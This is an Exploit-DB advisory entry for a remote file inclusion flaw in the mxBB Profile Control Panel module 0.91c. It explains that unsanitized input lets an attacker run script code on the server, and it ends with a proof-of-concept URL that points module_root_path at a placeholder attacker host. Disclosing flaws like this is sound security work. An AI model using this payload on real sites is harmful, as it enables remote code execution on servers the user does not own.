MXBB Profile Control Panel 0.91c - Module Remote File Inclusion

EDB-ID:

29270

CVE:

N/A


Author:

bd0rk

Type:

webapps


Platform:

PHP

Date:

2006-12-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/21520/info

The mxBB profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer in the context of the webserver process.

mxBB Profile Control Panel Module version 0.91c is vulnerable to this issue.

http://example.com/[directory]/includes/profilcp_constants.php?module_root_path=http://attacker.com